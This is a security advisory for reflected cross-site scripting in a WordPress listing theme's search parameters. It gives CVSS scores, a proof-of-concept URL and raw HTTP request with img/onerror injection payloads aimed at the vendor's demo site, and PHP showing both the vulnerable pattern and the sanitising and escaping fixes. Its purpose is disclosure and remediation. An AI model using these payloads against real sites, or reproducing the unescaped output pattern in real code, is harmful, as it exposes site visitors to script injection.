CVSS3: 6.1 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVSS2: 4.3 Medium
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
The theme did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameters in its listing page, leading to reflected Cross-Site Scripting issues.
--
PoC | Unauthenticated Reflected XSS & XFS | Listing search query:

https://bello.bold-themes.com/main-demo/listing/?listing_list_view=standard13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`listing_list_view`);>&bt_bb_listing_field_my_lat=13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`bt_bb_listing_field_my_lat`);>&bt_bb_listing_field_my_lng=13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`bt_bb_listing_field_my_lng`);>&bt_bb_listing_field_distance_value=13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`bt_bb_listing_field_distance_value`);>&bt_bb_listing_field_my_lat_default=13&bt_bb_listing_field_my_lng_default=13&bt_bb_listing_field_keyword=13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`bt_bb_listing_field_keyword`);>&bt_bb_listing_field_location_autocomplete=13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`bt_bb_listing_field_location_autocomplete`);>&bt_bb_listing_field_category=all&bt_bb_listing_field_price_range_from=13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`bt_bb_listing_field_price_range_from`);>&bt_bb_listing_field_price_range_to=13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`bt_bb_listing_field_price_range_to`);>

GET /main-demo/listing/?listing_list_view=standard13%22--%3E%22%3E%27%20--%20%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(listing_list_view);%3E&bt_bb_listing_field_my_lat=13%22--%3E%22%3E%27%20--%20%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_my_lat);%3E&bt_bb_listing_field_my_lng=13%22--%3E%22%3E%27%20--%20%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_my_lng);%3E&bt_bb_listing_field_distance_value=13%22--%3E%22%3E%27%20--%20%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_distance_value);%3E&bt_bb_listing_field_my_lat_default=13&bt_bb_listing_field_my_lng_default=13&bt_bb_listing_field_keyword=13%22--%3E%22%3E%27%20--%20%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_keyword);%3E&bt_bb_listing_field_location_autocomplete=13%22--%3E%22%3E%27%20--%20%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_location_autocomplete);%3E&bt_bb_listing_field_category=all&bt_bb_listing_field_price_range_from=13%22--%3E%22%3E%27%20--%20%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_price_range_from);%3E&bt_bb_listing_field_price_range_to=13%22--%3E%22%3E%27%20--%20%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(bt_bb_listing_field_price_range_to);%3E HTTP/1.1
Host: bello.bold-themes.com
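The root cause named in the description is missing input sanitisation and output escaping of the listing-search GET parameters. The block below is an added example, not the theme's own code: it shows the assumed shape of that bug next to the WordPress-idiomatic fix for each kind of field (free text, numeric, enumerated, and values handed to inline JavaScript). The function names, the allow-listed view names and btInitMap() are hypothetical; the parameter names are the ones listed in this advisory.

```php
<?php
// Added example (not the theme's code). Parameter names come from the advisory;
// function names, view names and btInitMap() are hypothetical.

// VULNERABLE (assumed shape): raw request data is concatenated into an attribute.
// A value containing a double quote and angle brackets ends the attribute and the
// tag, so attacker-controlled markup is rendered in the victim's browser.
function bt_listing_keyword_field_unsafe() {
    $keyword = isset( $_GET['bt_bb_listing_field_keyword'] ) ? $_GET['bt_bb_listing_field_keyword'] : '';
    return '<input type="text" name="bt_bb_listing_field_keyword" value="' . $keyword . '">';
}

// HARDENED free-text field: sanitise on input AND escape on output.
function bt_listing_keyword_field_safe() {
    // wp_unslash() removes the slashes WordPress adds to superglobals;
    // sanitize_text_field() strips tags, invalid UTF-8 and line breaks.
    $keyword = isset( $_GET['bt_bb_listing_field_keyword'] )
        ? sanitize_text_field( wp_unslash( $_GET['bt_bb_listing_field_keyword'] ) )
        : '';
    // Sanitisation is not output encoding: esc_attr() is still required here.
    return '<input type="text" name="bt_bb_listing_field_keyword" value="' . esc_attr( $keyword ) . '">';
}

// HARDENED numeric fields (lat, lng, distance, price range): validate the type,
// fall back to a default, and never reflect the raw string.
function bt_listing_numeric_param( $name, $default = 0.0 ) {
    if ( ! isset( $_GET[ $name ] ) || ! is_numeric( $_GET[ $name ] ) ) {
        return (float) $default;
    }
    return (float) $_GET[ $name ];
}

// HARDENED enumerated field: allow-list the view name instead of trusting input.
function bt_listing_list_view() {
    $allowed = array( 'standard', 'grid', 'map' ); // hypothetical set of views
    $view    = isset( $_GET['listing_list_view'] )
        ? sanitize_key( wp_unslash( $_GET['listing_list_view'] ) )
        : 'standard';
    return in_array( $view, $allowed, true ) ? $view : 'standard';
}

// Values passed to inline JavaScript (e.g. the map centre) need a JS-safe
// encoding: esc_attr() does not protect a <script> block, so use wp_json_encode()
// with the JSON_HEX_* flags so that '<', '>', quotes and '&' cannot close the tag.
function bt_listing_map_init_script() {
    $centre = array(
        'lat' => bt_listing_numeric_param( 'bt_bb_listing_field_my_lat' ),
        'lng' => bt_listing_numeric_param( 'bt_bb_listing_field_my_lng' ),
    );
    $json = wp_json_encode( $centre, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP );
    return '<script>btInitMap(' . $json . ');</script>';
}
```

Sanitising alone is not enough for the attribute case: sanitize_text_field() leaves a lone double quote in place, which is why esc_attr() is applied at the output point as well.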